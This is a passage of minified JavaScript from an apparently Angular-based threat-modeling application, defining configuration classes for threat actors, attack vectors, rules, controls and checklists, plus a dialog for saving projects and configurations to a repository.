i=[];return null==a||a.GetChecklists().filter(n=>n.Type.ID==this.ID).forEach(n=>i.push({Type:li.DeleteChecklist,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e);this.RequirementTypes.forEach(n=>e.DeleteRequirementType(n)),i.forEach(n=>{n.Type==li.DeleteChecklist&&a.DeleteChecklist(n.Param)})}static FromJSON(a,e){return new Jg(a,e)}}class CM extends Ln{constructor(a,e,i,n){super(a),this.config=n,this.project=i,this.Type=e,this.Data.RequirementValues||(this.Data.RequirementValues=[])}get Type(){return this.config.GetChecklistType(this.Data.typeID)}set Type(a){this.Data.typeID=null==a?void 0:a.ID}get RequirementValues(){return this.Data.RequirementValues}set RequirementValues(a){this.Data.RequirementValues=a}FindReferences(a,e){return[]}OnDelete(a,e){let i=a.GetDevices().find(n=>n.Checklists.includes(this));i&&i.RemoveChecklist(this)}static FromJSON(a,e,i){return new CM(a,i.GetChecklistType(a.typeID),e,i)}}class Wu extends Ln{constructor(a){if(super(a),this.assetGroups=[],this.myData=[],this.stencilTypeMap=new Map,this.stencilTypeTemplates=[],this.stencilThreatMnemonics=[],this.protocolMap=new Map,this.myComponentSWTypeMap=new Map,this.myComponentSWTypeGroups=[],this.myComponentPTypeMap=new Map,this.myComponentPTypeGroups=[],this.threatActors=[],this.threatCategoryGroups=[],this.threatCategoryMap=new Map,this.attackVectorGroups=[],this.attackVectorMap=new Map,this.threatQuestionMap=new Map,this.threatRuleGroups=[],this.threatRuleMap=new Map,this.controlGroups=[],this.controlMap=new Map,this.requirementTypes=[],this.checklistTypes=[],this.FileChanged=!1,this.Data.Name||(this.Data.Name="New Configuration"),this.Data.Version||(this.Data.Version=D5.ConfigVersion),!this.Data.threatLibraryID){let e=this.CreateAttackVectorGroup(null);e.Name="Threat Library",this.Data.threatLibraryID=e.ID}if(!this.Data.DFDthreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="CPDFD Rules",e.RuleType=on.DFD,this.Data.DFDthreatRuleGroupsID=e.ID}if(!this.Data.stencilThreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="Stencil Rules",e.RuleType=on.Stencil,this.Data.stencilThreatRuleGroupsID=e.ID}if(!this.Data.componentThreatRuleGroupsID){let e=this.CreateThreatRuleGroup(null);e.Name="Component Rules",e.RuleType=on.Component,this.Data.componentThreatRuleGroupsID=e.ID}if(!this.Data.assetGroupID){let e=this.CreateAssetGroup(null);e.Name="Asset Groups",this.Data.assetGroupID=e.ID}if(!this.Data.controlLibraryID){let e=this.CreateControlGroup(null);e.Name="Controls",this.Data.controlLibraryID=e.ID}}get Version(){return this.Data.Version}get AssetGroups(){return this.GetAssetGroup(this.Data.assetGroupID)}get ThreatLibrary(){return this.GetAttackVectorGroup(this.Data.threatLibraryID)}get DFDThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.DFDthreatRuleGroupsID)}get StencilThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.stencilThreatRuleGroupsID)}get ComponentThreatRuleGroups(){return this.GetThreatRuleGroup(this.Data.componentThreatRuleGroupsID)}get ControlLibrary(){return this.GetControlGroup(this.Data.controlLibraryID)}GetAssetGroups(){return this.assetGroups}GetMyDatas(){return this.myData}GetStencilTypes(){return Array.from(this.stencilTypeMap,([a,e])=>e)}GetStencilTypeTemplates(){return this.stencilTypeTemplates}GetStencilThreatMnemonics(){return this.stencilThreatMnemonics}GetProtocols(){return Array.from(this.protocolMap,([a,e])=>e)}GetMyComponentTypes(a){return a==zr.Software?this.GetMyComponentSWTypes():this.GetMyComponentPTypes()}GetMyComponentSWTypes(){return Array.from(this.myComponentSWTypeMap,([a,e])=>e)}GetMyComponentSWTypeGroups(){return this.myComponentSWTypeGroups}GetMyComponentTypeGroups(a){return a==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups}GetMyComponentPTypes(){return Array.from(this.myComponentPTypeMap,([a,e])=>e)}GetMyComponentPTypeGroups(){return this.myComponentPTypeGroups}GetThreatActors(){return this.threatActors}GetThreatCategoryGroups(){return this.threatCategoryGroups}GetThreatCategories(){return Array.from(this.threatCategoryMap,([a,e])=>e)}GetAttackVectorGroups(){return this.attackVectorGroups}GetAttackVectors(){return Array.from(this.attackVectorMap,([a,e])=>e)}GetThreatQuestions(){return Array.from(this.threatQuestionMap,([a,e])=>e)}GetThreatRuleGroups(){return this.threatRuleGroups}GetThreatRules(){return Array.from(this.threatRuleMap,([a,e])=>e)}GetControlGroups(){return this.controlGroups}GetControls(){return Array.from(this.controlMap,([a,e])=>e)}GetRequirementTypes(){return this.requirementTypes}GetChecklistTypes(){return this.checklistTypes}GetAssetGroup(a){return this.assetGroups.find(e=>e.ID==a)}CreateAssetGroup(a){let e=new Zl({},null,this);return this.assetGroups.push(e),e.Name=Gi.FindUniqueName("Asset Group",this.assetGroups.map(i=>i.Name)),null!=a&&a.AddAssetGroup(e),e}DeleteAssetGroup(a){const e=this.assetGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.assetGroups.splice(e,1)),e>=0}GetMyData(a){return this.myData.find(e=>e.ID==a)}CreateMyData(a){let e=new Pu({},null,this);return a&&a.AddMyData(e),this.myData.push(e),e.Name=Gi.FindUniqueName("Data",this.GetMyDatas().map(i=>i.Name)),e}DeleteMyData(a){const e=this.myData.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.myData.splice(e,1)),e>=0}GetStencilType(a){return this.stencilTypeMap.get(a)}CreateStencilType(a){let e=new oM({},this);return e.ElementTypeID=a,e.Name=Sc.Constructor(a).GetDefaultType(this).Name,this.stencilTypeMap.set(e.ID,e),e.Name=Gi.FindUniqueName(e.Name,this.GetStencilTypes().map(i=>i.Name)),e}DeleteStencilType(a){return!!this.stencilTypeMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeMap.delete(a.ID),!0)}GetStencilElementType(a){return a?this.GetStencilTypes().find(e=>e.IsDefault&&e.ElementTypeID==a.ElementTypeID):null}GetAllStencilProperties(a){if(!a)return null;let e=[];return a.Properties&&e.push(...a.Properties),!a.IsDefault&&this.GetStencilElementType(a).Properties&&e.push(...this.GetStencilElementType(a).Properties),a.ElementTypeID==Et.DataFlow&&e.push(...Lu.GetDefaultType(this).Properties),e}MoveItemInStencilTypes(a,e){this.moveItemInMap("stencilTypeMap",a,e)}GetStencilTypeTemplate(a){return this.stencilTypeTemplates.find(e=>e.ID==a)}CreateStencilTypeTemplate(){let a=new rM({},this);return this.stencilTypeTemplates.push(a),a.Name=Gi.FindUniqueName("Template",this.GetStencilTypeTemplates().map(e=>e.Name)),a}DeleteStencilTypeTemplate(a){const e=this.stencilTypeTemplates.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeTemplates.splice(e,1)),e>=0}GetStencilThreatMnemonic(a){return this.stencilThreatMnemonics.find(e=>e.ID==a)}CreateStencilThreatMnemonic(){let a=new sM({},this);return this.stencilThreatMnemonics.push(a),a.Name=Gi.FindUniqueName("Mnemonic",this.GetStencilThreatMnemonics().map(e=>e.Name)),a}DeleteStencilThreatMnemonic(a){const e=this.stencilThreatMnemonics.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.stencilThreatMnemonics.splice(e,1)),e>=0}GetProtocol(a){return this.protocolMap.get(a)}CreateProtocol(){let a=new Lu({},this);return this.protocolMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Protocol",this.GetProtocols().map(e=>e.Name)),a}DeleteProtocol(a){return!!this.protocolMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.protocolMap.delete(a.ID),!0)}MoveItemInProtocols(a,e){this.moveItemInMap("protocolMap",a,e)}GetMyComponentTypeGroup(a){let e=this.myComponentSWTypeGroups.find(i=>i.ID==a);return e||(e=this.myComponentPTypeGroups.find(i=>i.ID==a)),e}CreateMyComponentTypeGroup(a){let e=new Xb({},this);e.ComponentTypeID=a;let i=a==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups;return e.Name=Gi.FindUniqueName("Component Type Group",i.map(n=>n.Name)),i.push(e),e}DeleteMyComponentTypeGroup(a){let e=a.ComponentTypeID==zr.Software?this.myComponentSWTypeGroups:this.myComponentPTypeGroups;const i=e.indexOf(a);return i>=0&&(a.OnDelete(this.ProjectFile,this),e.splice(i,1)),i>=0}GetMyComponentType(a){return this.myComponentSWTypeMap.has(a)?this.myComponentSWTypeMap.get(a):this.myComponentPTypeMap.has(a)?this.myComponentPTypeMap.get(a):void 0}CreateMyComponentType(a){let e=new Kb({},this);return a.AddMyComponentType(e),e.ComponentTypeID=a.ComponentTypeID,a.ComponentTypeID==zr.Software?this.myComponentSWTypeMap.set(e.ID,e):this.myComponentPTypeMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Component Type",this.GetMyComponentTypes(a.ComponentTypeID).map(i=>i.Name)),e}DeleteMyComponentType(a){let e=a.ComponentTypeID==zr.Software?this.myComponentSWTypeMap:this.myComponentPTypeMap;return!!e.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),e.delete(a.ID),!0)}FindGroupOfMyComponent(a){return a.ComponentTypeID==zr.Software?this.myComponentSWTypeGroups.find(e=>e.Types.some(i=>i.ID==a.ID)):this.myComponentPTypeGroups.find(e=>e.Types.some(i=>i.ID==a.ID))}GetThreatActor(a){return this.threatActors.find(e=>e.ID==a)}CreateThreatActor(){let a=new jp({},null,this);return a.Name=Gi.FindUniqueName("Threat Actor",this.threatActors.map(e=>e.Name)),a.Likelihood=lr.Medium,this.threatActors.push(a),a}DeleteThreatActor(a){const e=this.threatActors.indexOf(a);return e>=0&&this.threatActors.splice(e,1),e>=0}GetThreatCategory(a){return this.threatCategoryMap.get(a)}CreateThreatCategory(){let a=new Jb({},this);return this.threatCategoryMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Threat Category",this.GetThreatCategories().map(e=>e.Name)),a}DeleteThreatCategory(a){return!!this.threatCategoryMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.stencilTypeMap.delete(a.ID),!0)}FindGroupOfThreatCategory(a){return this.threatCategoryGroups.find(e=>e.ThreatCategories.some(i=>i.ID==a.ID))}GetThreatCategoryGroup(a){return this.threatCategoryGroups.find(e=>e.ID==a)}CreateThreatCategoryGroup(){let a=new Zb({},this);return this.threatCategoryGroups.push(a),a.Name=Gi.FindUniqueName("Group",this.GetThreatCategoryGroups().map(e=>e.Name)),a}DeleteThreatCategoryGroup(a){const e=this.threatCategoryGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.threatCategoryGroups.splice(e,1)),e>=0}GetAttackVectorGroup(a){return this.attackVectorGroups.find(e=>e.ID==a)}CreateAttackVectorGroup(a){let e=new tM({},this);return this.attackVectorGroups.push(e),e.Name=Gi.FindUniqueName("Attack Vector Group",this.attackVectorGroups.map(i=>i.Name)),null!=a&&a.AddAttackVectorGroup(e),e}DeleteAttackVectorGroup(a){const e=this.attackVectorGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.attackVectorGroups.splice(e,1)),e>=0}FindGroupOfAttackVectorGroup(a){return this.attackVectorGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetAttackVector(a){return this.attackVectorMap.get(a)}CreateAttackVector(a){let e=new Wp({},this);return a&&a.AddAttackVector(e),this.attackVectorMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Attack Vector",this.GetAttackVectors().map(i=>i.Name)),e}DeleteAttackVector(a){return!!this.attackVectorMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.attackVectorMap.delete(a.ID),!0)}FindGroupOfAttackVector(a){return this.attackVectorGroups.find(e=>e.AttackVectors.some(i=>i.ID==a.ID))}GetThreatQuestion(a){return this.threatQuestionMap.get(a)}CreateThreatQuestion(){let a=new iM({},this);return this.threatQuestionMap.set(a.ID,a),a.Name=Gi.FindUniqueName("Question",this.GetThreatQuestions().map(e=>e.Name)),a}DeleteThreatQuestion(a){return!!this.threatQuestionMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.threatQuestionMap.delete(a.ID),!0)}MoveItemInThreatQuestions(a,e){this.moveItemInMap("threatQuestionMap",a,e)}GetThreatRuleGroup(a){return this.threatRuleGroups.find(e=>e.ID==a)}CreateThreatRuleGroup(a){let e=new aM({},this);return this.threatRuleGroups.push(e),e.Name=Gi.FindUniqueName("Threat Rule Group",this.threatRuleGroups.map(i=>i.Name)),null!=a&&a.AddThreatRuleGroup(e),e}DeleteThreatRuleGroup(a){const e=this.threatRuleGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.threatRuleGroups.splice(e,1)),e>=0}FindGroupOfThreatRuleGroup(a){return this.threatRuleGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetThreatRule(a){return this.threatRuleMap.get(a)}CreateThreatRule(a,e){let i=new Vp({},this);return i.RuleType=e,a&&a.AddThreatRule(i),this.threatRuleMap.set(i.ID,i),i.Name=Gi.FindUniqueName("Threat Rule",this.GetThreatRules().map(n=>n.Name)),i}DeleteThreatRule(a){return!!this.threatRuleMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.threatRuleMap.delete(a.ID),!0)}FindGroupOfThreatRule(a){return this.threatRuleGroups.find(e=>e.ThreatRules.some(i=>i.ID==a.ID))}MoveItemInThreatRules(a,e){this.moveItemInMap("threatRuleMap",a,e)}GetControl(a){return this.controlMap.get(a)}CreateControl(a){let e=new Fg({},this);return a&&a.AddControl(e),this.controlMap.set(e.ID,e),e.Name=Gi.FindUniqueName("Control",this.GetControls().map(i=>i.Name)),e}DeleteControl(a){return!!this.controlMap.has(a.ID)&&(a.OnDelete(this.ProjectFile,this),this.controlMap.delete(a.ID),!0)}FindGroupOfControl(a){return this.controlGroups.find(e=>e.Controls.some(i=>i.ID==a.ID))}GetControlGroup(a){return this.controlGroups.find(e=>e.ID==a)}CreateControlGroup(a){let e=new Yb({},this);return this.controlGroups.push(e),e.Name=Gi.FindUniqueName("Control Group",this.controlGroups.map(i=>i.Name)),null!=a&&a.AddControlGroup(e),e}DeleteControlGroup(a){const e=this.controlGroups.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.controlGroups.splice(e,1)),e>=0}FindGroupOfControlGroup(a){return this.ControlLibrary.SubGroups.includes(a)?this.ControlLibrary:this.controlGroups.find(e=>e.SubGroups.some(i=>i.ID==a.ID))}GetRequirementType(a){return this.requirementTypes.find(e=>e.ID==a)}CreateRequirementType(){let a=new Yg({},this);return this.requirementTypes.push(a),a.Name=Gi.FindUniqueName("Requirement",this.GetRequirementTypes().map(e=>e.Name)),a}DeleteRequirementType(a){const e=this.requirementTypes.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.requirementTypes.splice(e,1)),e>=0}GetChecklistType(a){return this.checklistTypes.find(e=>e.ID==a)}CreateChecklistType(){let a=new Jg({},this);return this.checklistTypes.push(a),a.Name=Gi.FindUniqueName("Checklist",this.GetChecklistTypes().map(e=>e.Name)),a}DeleteChecklistType(a){const e=this.checklistTypes.indexOf(a);return e>=0&&(a.OnDelete(this.ProjectFile,this),this.checklistTypes.splice(e,1)),e>=0}moveItemInMap(a,e,i){let r=Array.from(this[a].entries());r.splice(i,0,r.splice(e,1)[0]),this[a]=new Map(r)}FindReferences(a,e){return null}OnDelete(a,e){}ToJSON(){let a={Data:this.Data,assetGroups:[],myData:[],stencilTypes:[],stencilTypeTemplates:[],stencilThreatMnemonics:[],protocols:[],myComponentSWTypes:[],myComponentSWTypeGroups:[],myComponentPTypes:[],myComponentPTypeGroups:[],threatActors:[],threatCategoryGroups:[],threatCategories:[],attackVectorGroups:[],attackVectors:[],threatQuestions:[],threatRuleGroups:[],threatRules:[],controls:[],controlGroups:[],requirementTypes:[],checklistTypes:[]};return this.assetGroups.forEach(e=>a.assetGroups.push(e.ToJSON())),this.myData.forEach(e=>a.myData.push(e.ToJSON())),this.stencilTypeMap.forEach(e=>a.stencilTypes.push(e.ToJSON())),this.stencilTypeTemplates.forEach(e=>a.stencilTypeTemplates.push(e.ToJSON())),this.stencilThreatMnemonics.forEach(e=>a.stencilThreatMnemonics.push(e.ToJSON())),this.protocolMap.forEach(e=>a.protocols.push(e.ToJSON())),this.myComponentSWTypeMap.forEach(e=>a.myComponentSWTypes.push(e.ToJSON())),this.myComponentSWTypeGroups.forEach(e=>a.myComponentSWTypeGroups.push(e.ToJSON())),this.myComponentPTypeMap.forEach(e=>a.myComponentPTypes.push(e.ToJSON())),this.myComponentPTypeGroups.forEach(e=>a.myComponentPTypeGroups.push(e.ToJSON())),this.threatActors.forEach(e=>a.threatActors.push(e.ToJSON())),this.threatCategoryGroups.forEach(e=>a.threatCategoryGroups.push(e.ToJSON())),this.threatCategoryMap.forEach(e=>a.threatCategories.push(e.ToJSON())),this.attackVectorGroups.forEach(e=>a.attackVectorGroups.push(e.ToJSON())),this.attackVectorMap.forEach(e=>a.attackVectors.push(e.ToJSON())),this.threatQuestionMap.forEach(e=>a.threatQuestions.push(e.ToJSON())),this.threatRuleGroups.forEach(e=>a.threatRuleGroups.push(e.ToJSON())),this.threatRuleMap.forEach(e=>a.threatRules.push(e.ToJSON())),this.controlGroups.forEach(e=>a.controlGroups.push(e.ToJSON())),this.controlMap.forEach(e=>a.controls.push(e.ToJSON())),this.requirementTypes.forEach(e=>a.requirementTypes.push(e.ToJSON())),this.checklistTypes.forEach(e=>a.checklistTypes.push(e.ToJSON())),a}static FromJSON(a){var e,i,n,r,c,d;const T=new Wu(a.Data);return a.assetGroups.forEach(k=>T.assetGroups.push(Zl.FromJSON(k,null,T))),a.myData.forEach(k=>T.myData.push(Pu.FromJSON(k,null,T))),a.stencilTypes.forEach(k=>T.stencilTypeMap.set(k.ID,oM.FromJSON(k,T))),a.stencilTypeTemplates.forEach(k=>T.stencilTypeTemplates.push(rM.FromJSON(k,T))),null===(e=a.stencilThreatMnemonics)||void 0===e||e.forEach(k=>T.stencilThreatMnemonics.push(sM.FromJSON(k,T))),a.protocols.forEach(k=>T.protocolMap.set(k.ID,Lu.FromJSON(k,T))),a.myComponentSWTypes.forEach(k=>T.myComponentSWTypeMap.set(k.ID,Kb.FromJSON(k,T))),a.myComponentSWTypeGroups.forEach(k=>T.myComponentSWTypeGroups.push(Xb.FromJSON(k,T))),a.myComponentPTypes.forEach(k=>T.myComponentPTypeMap.set(k.ID,Kb.FromJSON(k,T))),a.myComponentPTypeGroups.forEach(k=>T.myComponentPTypeGroups.push(Xb.FromJSON(k,T))),null===(i=a.threatActors)||void 0===i||i.forEach(k=>T.threatActors.push(jp.FromJSON(k,null,T))),a.threatCategories.forEach(k=>T.threatCategoryMap.set(k.ID,Jb.FromJSON(k,T))),a.threatCategoryGroups.forEach(k=>T.threatCategoryGroups.push(Zb.FromJSON(k,T))),a.attackVectorGroups.forEach(k=>T.attackVectorGroups.push(tM.FromJSON(k,T))),a.attackVectors.forEach(k=>T.attackVectorMap.set(k.ID,Wp.FromJSON(k,T))),a.threatQuestions.forEach(k=>T.threatQuestionMap.set(k.ID,iM.FromJSON(k,T))),a.threatRuleGroups.forEach(k=>T.threatRuleGroups.push(aM.FromJSON(k,T))),a.threatRules.forEach(k=>T.threatRuleMap.set(k.ID,Vp.FromJSON(k,T))),null===(n=a.controlGroups)||void 0===n||n.forEach(k=>T.controlGroups.push(Yb.FromJSON(k,T))),null===(r=a.controls)||void 0===r||r.forEach(k=>T.controlMap.set(k.ID,Fg.FromJSON(k,T))),null===(c=a.requirementTypes)||void 0===c||c.forEach(k=>T.requirementTypes.push(Yg.FromJSON(k,T))),null===(d=a.checklistTypes)||void 0===d||d.forEach(k=>T.checklistTypes.push(Jg.FromJSON(k,T))),T.FileChanged=!1,T}static DefaultFile(){return Wu.FromJSON(JSON.parse(JSON.stringify(gwe)))}}function eOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e.id),C(1),ke(e.name)}}function tOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        Name is "),m(2,"strong"),s(3,"required"),u(),s(4,"\n      "),u())}function iOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        A project "),m(2,"strong"),s(3,"already exists"),u(),s(4," with this name\n      "),u())}function aOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e.Key),C(1),ke(e.Value)}}function nOe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",3),s(3,"\n      "),m(4,"mat-label"),s(5,"Repository"),u(),s(6,"\n      "),m(7,"mat-select",11),he("valueChange",function(n){return be(e),Me(B().data.newProject.repoId=n)}),s(8,"\n        "),ne(9,eOe,2,2,"mat-option",12),s(10,"\n      "),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"mat-form-field"),s(14,"\n      "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n      "),it(19,"input",13),s(20,"\n      "),m(21,"span",14),s(22,".ttmp"),u(),s(23,"\n      "),ne(24,tOe,5,0,"mat-error",2),s(25,"\n      "),ne(26,iOe,5,0,"mat-error",2),s(27,"\n    "),u(),s(28,"\n    "),m(29,"mat-form-field",3),s(30,"\n      "),m(31,"mat-label"),s(32,"Configuration"),u(),s(33,"\n      "),m(34,"mat-select",11),he("valueChange",function(n){return be(e),Me(B().data.newProject.configFile=n)}),s(35,"\n        "),ne(36,aOe,2,2,"mat-option",12),s(37,"\n      "),u(),s(38,"\n    "),u(),s(39,"\n  "),Mt()}if(2&t){const e=B();C(7),V("value",e.data.newProject.repoId),C(2),V("ngForOf",e.Repos),C(7),ke(re(17,9,"general.Name")),C(3),V("formControl",e.nameFormControl)("errorStateMatcher",e.matcher),C(5),V("ngIf",e.nameFormControl.hasError("required")),C(2),V("ngIf",e.nameFormControl.hasError("forbiddenName")),C(8),V("value",e.data.newProject.configFile),C(2),V("ngForOf",e.Configs)}}function oOe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e.id),C(1),ke(e.name)}}function rOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        Name is "),m(2,"strong"),s(3,"required"),u(),s(4,"\n      "),u())}function sOe(t,a){1&t&&(m(0,"mat-error"),s(1,"\n        A configuration "),m(2,"strong"),s(3,"already exists"),u(),s(4," with this name\n      "),u())}function cOe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",3),s(3,"\n      "),m(4,"mat-label"),s(5,"Repository"),u(),s(6,"\n      "),m(7,"mat-select",11),he("valueChange",function(n){return be(e),Me(B().data.newConfig.repoId=n)}),s(8,"\n        "),ne(9,oOe,2,2,"mat-option",12),s(10,"\n      "),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"mat-form-field"),s(14,"\n      "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n      "),it(19,"input",16),s(20,"\n      "),m(21,"span",14),s(22,".ttmc"),u(),s(23,"\n      "),ne(24,rOe,5,0,"mat-error",2),s(25,"\n      "),ne(26,sOe,5,0,"mat-error",2),s(27,"\n    "),u(),s(28,"\n  "),Mt()}if(2&t){const e=B();C(7),V("value",e.data.newConfig.repoId),C(2),V("ngForOf",e.Repos),C(7),ke(re(17,8,"general.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("formControl",e.nameFormControl)("errorStateMatcher",e.matcher),C(5),V("ngIf",e.nameFormControl.hasError("required")),C(2),V("ngIf",e.nameFormControl.hasError("forbiddenName"))}}function lOe(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",17),he("ngModelChange",function(n){return be(e),Me(B().data.removePW=n)}),s(1),oe(2,"translate"),u()}2&t&&(V("ngModel",B().data.removePW),C(1),ke(re(2,2,"dialog.save.removePW")))}function dOe(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",3),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",18),he("ngModelChange",function(n){return be(e),Me(B().data.pw=n)})("keydown.enter",function(){return be(e),Me(B().dialogRef.close(!0))}),u(),s(7,"\n    "),m(8,"mat-icon",19),he("click",function(){be(e);const n=B();return Me(n.show=!n.show)}),s(9),u(),s(10,"\n    "),m(11,"mat-icon",20),oe(12,"translate"),s(13,"privacy_tip"),u(),s(14,"\n  "),u()}if(2&t){const e=B();C(3),ke(re(4,5,"dialog.save.addPW")),C(3),V("type",e.show?"text":"password")("ngModel",e.data.pw),C(3),ke(e.show?"visibility_off":"visibility"),C(2),at("matTooltip",re(12,7,"dialog.save.security"))}}function mOe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){return be(e),Me(B().onSave())}),s(1),oe(2,"translate"),u()}2&t&&(V("disabled",!B().canSave)("mat-dialog-close",!0),C(1),ke(re(2,3,"general.Save")))}function uOe(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B().onSave())}),s(1),oe(2,"translate"),u()}2&t&&(V("disabled",!B().canSave)("mat-dialog-close",!0),C(1),ke(re(2,3,"general.Save")))}class hOe{isErrorState(a,e){return!!(a&&a.invalid&&(a.dirty||a.touched||e&&e.submitted))}}function fOe(t){return a=>{let e=t.includes(a.value+".ttmp");return e||(e=t.includes(a.value+".ttmc")),e?{forbiddenName:{value:a.value}}:null}}let jG=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.data=i,this.dataService=n,this.nameFormControl=new lu("",[Ad.required,fOe([...this.dataService.AvailableGHProjects.map(r=>r.name),...this.dataService.AvailableGHConfigs.map(r=>r.name)])]),this.matcher=new hOe,this.show=!1}get canSave(){return!("newProject"in this.data&&(null==this.data.newProject.repoId||this.nameFormControl.hasError("required")||this.nameFormControl.hasError("forbiddenName"))||"newConfig"in this.data&&(null==this.data.newConfig.repoId||this.nameFormControl.hasError("required")||this.nameFormControl.hasError("forbiddenName")))}get Configs(){return this.configs||(this.configs=[{Key:null,Value:"Default Configuration"}],this.dataService.AvailableGHConfigs.forEach(e=>{this.configs.push({Key:e,Value:e.name})})),this.configs}get Repos(){return this.dataService.Repos.filter(e=>e.isWritable)}ngOnInit(){}onSave(){"newProject"in this.data?(this.data.newProject.name=this.nameFormControl.value+".ttmp",this.data.newProject.path="projects/"+this.nameFormControl.value+".ttmp"):"newConfig"in this.data&&(this.data.newConfig.name=this.nameFormControl.value+".ttmc",this.data.newConfig.path="configs/"+this.nameFormControl.value+".ttmc")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(gp),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-save-dialog"]],decls:37,vars:17,consts:[["mat-dialog-title",""],["mat-dialog-content","",2,"display","grid"],[4,"ngIf"],[1,"field-width"],["matInput","","type","text","placeholder","Update",1,"field-width",3,"spellcheck","ngModel","ngModelChange","keydown.enter"],["color","primary","style","padding-bottom: 10px;",3,"ngModel","ngModelChange",4,"ngIf"],["class","field-width",4,"ngIf"],["mat-dialog-actions","",2,"float","right"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"disabled","mat-dialog-close","click",4,"ngIf"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close","click",4,"ngIf"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","",3,"formControl","errorStateMatcher"],["matSuffix",""],[3,"value"],["matInput","",3,"spellcheck","formControl","errorStateMatcher"],["color","primary",2,"padding-bottom","10px",3,"ngModel","ngModelChange"],["matInput","",1,"field-width",3,"type","ngModel","ngModelChange","keydown.enter"],["matSuffix","",3,"click"],["matSuffix","",3,"matTooltip"],["mat-button","",3,"disabled","mat-dialog-close","click"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close","click"]],template:function(e,i){1&e&&(m(0,"h1",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"div",1),s(5,"\n  "),ne(6,nOe,40,11,"ng-container",2),s(7,"\n\n  "),ne(8,cOe,29,10,"ng-container",2),s(9,"\n\n  "),m(10,"mat-form-field",3),s(11,"\n    "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n    "),m(16,"input",4),he("ngModelChange",function(r){return i.data.msg=r})("keydown.enter",function(){return i.dialogRef.close(!0)}),u(),s(17,"\n  "),u(),s(18,"\n  "),it(19,"br"),s(20,"\n  "),ne(21,lOe,3,4,"mat-checkbox",5),s(22,"\n  "),ne(23,dOe,15,9,"mat-form-field",6),s(24,"\n"),u(),s(25,"\n"),m(26,"div",7),s(27,"\n  "),m(28,"button",8),s(29),oe(30,"translate"),u(),s(31,"\n  "),ne(32,mOe,3,5,"button",9),s(33,"\n  "),ne(34,uOe,3,5,"button",10),s(35,"\n"),u(),s(36,"\n")),2&e&&(C(1),ke(re(2,11,"general.Save")),C(5),V("ngIf",i.data.newProject),C(2),V("ngIf",i.data.newConfig),C(5),ke(re(14,13,"dialog.save.CommitMsg")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.data.msg),C(5),V("ngIf",null!=i.data.removePW),C(2),V("ngIf",null==i.data.removePW),C(6),ke(re(30,15,"general.Cancel")),C(3),V("ngIf",i.data.newProject||i.data.newConfig),C(2),V("ngIf",!i.data.newProject&&!i.data.newConfig))},dependencies:[Zi,Ri,an,Ta,Ea,N4,oa,br,da,Tge,nn,un,jr,Nr,yr,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".field-width[_ngcontent-%COMP%]{width:355px}"]}),t})();var yM=de(2344);function pOe(t,a){if(1&t&&(m(0,"mat-icon",14),s(1),u()),2&t){const e=B();C(1),ke(e.GetIcon(e.SelectedProject))}}function 